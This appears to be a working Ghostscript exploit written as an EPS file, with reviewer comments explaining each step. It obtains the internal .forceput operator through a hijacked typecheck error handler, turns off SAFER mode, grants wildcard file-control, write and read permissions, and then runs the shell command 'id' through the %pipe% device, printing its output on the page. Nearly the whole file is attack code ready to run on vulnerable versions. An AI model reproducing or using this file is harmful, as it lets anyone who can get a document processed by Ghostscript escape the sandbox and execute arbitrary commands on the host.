%!PS-Adobe-3.0 EPSF-3.0
%%Pages: 1
%%BoundingBox:   0 0  1000 1000
%%LanguageLevel: 2
%%EndComments
%%BeginProlog
%%EndProlog

/initialdevicename currentpagedevice /OutputDevice get 100 string cvs def

% showline: string -> (nothing)
% Draws one string in black on the next text row: advances curpos down by one
% interval, moves to (interval, curpos) and shows the string. Leaves nothing on
% the operand stack. Relies on curpos and interval being defined by the caller.
/showline {
    0 0 0 setrgbcolor
    curpos interval sub /curpos exch def
    interval curpos moveto
    show
} def

% Remember the page device's OutputFile entry, or (undefined) when absent.
% Like initialdevicename, this value is never read later in the file.
currentpagedevice /OutputFile 2 copy known
  { get }
  { pop pop (undefined) }
ifelse
/outputfilename exch def


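% White background, then the text layout: 25 rows per page, Courier scaled to one
% row, cursor starting at the top edge.
1 1 1 setrgbcolor clippath fill

% PageSize is [width height]; index 1 is the page HEIGHT despite the name.
/pagewidth currentpagedevice /PageSize get 1 get def

/curpos pagewidth def

/interval pagewidth 25 div def

/Courier findfont interval scalefont setfont

% Smoke test that drawing works. The original followed this with an unconditional
% `pop`; showline consumes its string and leaves nothing, and nothing above pushed a
% net operand, so on the usual empty stack that `pop` raised stackunderflow and
% aborted the file before the bypass ran. Dropping it is safe: the later `clear`
% (after the .pdf_hook_DSC_Creator call) discards any stray operand anyway.
(works!) showline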



% Console helpers: each takes one string, prints it to stdout with a tag and a
% trailing newline. fail additionally raises stop, which (with no enclosing
% stopped context in this file) ends execution of the script.
/println  { print (\n) print } bind executeonly def
/info     { ([*] ) print println } bind executeonly def
/success  { ([+] ) print println } bind executeonly def
/fail     { ([-] ) print println stop } bind executeonly def

% Read cap in bytes: 16#10 = 16. readfile returns at most this many bytes, so
% longer command output (e.g. a full `id` line) is silently truncated.
/MaxFileSize 16#10 def
% readfile: filename -> string
% Opens the name for reading, reads up to MaxFileSize bytes (the readstring
% boolean is discarded, so a short read just yields a shorter substring), and
% closes the file. Any error from `file` propagates; there is no stopped wrapper.
/readfile {
  (r) file                                % -> file
  dup MaxFileSize string readstring pop   % -> file data
  exch closefile                          % -> data
} bind executeonly def


% Banner: three strings pushed, then printed top-down (the order is symmetric).
(=============================================================================)
(=   Safer Mode Bypass by `.forceput` Exposure from `.pdf_hook_DSC_Creator`  =)
(=============================================================================)
3 { println } repeat

(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
% Placeholder binding so the `store` in the handler below has something to overwrite.
/.forceput null def
% Element 24 of systemdict's .pdfdsc array is taken to be .pdf_hook_DSC_Creator.
% NOTE(review): this index and the `2 get 8 get` path below are offsets into the
% procedure body of one specific Ghostscript build; on other versions they will
% presumably select a different object, and the sanity check that follows is the
% only thing that catches that.
systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
% Keep the stock typecheck handler so it can be reinstated afterwards.
/&typecheck errordict /typecheck get def
/typecheckcount 0 def
% Temporary typecheck handler. It does not call stop, so after each typecheck the
% interpreter resumes executing the hook. On the second typecheck the object one
% below the top of the operand stack is expected to be a procedure whose element 2
% is itself a procedure with .forceput at element 8; that is stored as .forceput.
errordict /typecheck {
  /typecheckcount typecheckcount 1 add def
  typecheckcount 2 eq {
    1 index 2 get 8 get
    /.forceput exch store
  } if
} put
% Drive the hook with a null argument so it typechecks; then empty the operand stack.
null .pdf_hook_DSC_Creator clear
% Reinstate the original handler and remove the temporaries from currentdict.
errordict /typecheck currentdict /&typecheck get put
[
  /&typecheck
  /typecheckcount
  /.pdf_hook_DSC_Creator
] { currentdict exch undef } forall
(A candidate for .forceput operator found!) success

(Attempting sanity check with the candidate for .forceput operator...) info
% Probe: a genuine .forceput writes through a read-only dict. If the write did not
% land, drop the candidate so the `known` check below reports failure.
% NOTE(review): if the candidate is not a put-like operator, the call itself can
% raise an uncaught error here; there is no stopped wrapper around it.
<< /overwritten false >> readonly
begin
  currentdict /overwritten true .forceput
  overwritten not {
    /.forceput where { /.forceput undef } if
  } if
end
currentdict /.forceput known not {
  (.forceput operator could not found...) fail
} if
(Successfully got .forceput operator!) success

(Overwriting several flags to escape from Safer Mode...) info
% .forceput bypasses access checks, so these writes land in systemdict and in the
% userparams dict. The `(*)` wildcards grant control/write/read on every path.
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
% NOTE(review): presumably the save/restore pair is what makes the interpreter
% re-apply the modified userparams; confirm against the target Ghostscript version.
save restore

% Only the systemdict SAFER flag is verified here; the file-permission params are
% not exercised until the %pipe% read at the end of the file.
SAFER {
  (Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success

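% readfile was already defined above with an identical body (bind executeonly,
% same MaxFileSize cap); the byte-for-byte redefinition that stood here was
% redundant and has been removed. The definition above is the one osexec uses.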

% osexec: command-string -> output-string
% Prefixes the command with %pipe% and reads it via readfile, i.e. the command is
% executed by Ghostscript's pipe device and up to MaxFileSize bytes of its output
% are returned. This only succeeds once the file-permission params above allow it.
/osexec {
 (%pipe%) exch concatstrings readfile
} bind executeonly def

% Empty loop of ~300k iterations. NOTE(review): its purpose is not stated;
% presumably a delay or allocator churn before the save/restore below — confirm.
0 1 300367 {} for
% Second save/restore with any error swallowed.
{save restore} stopped {} if
% Payload: run `id` through %pipe% and draw its (MaxFileSize-capped) output.
(id) osexec showline
showpage
quit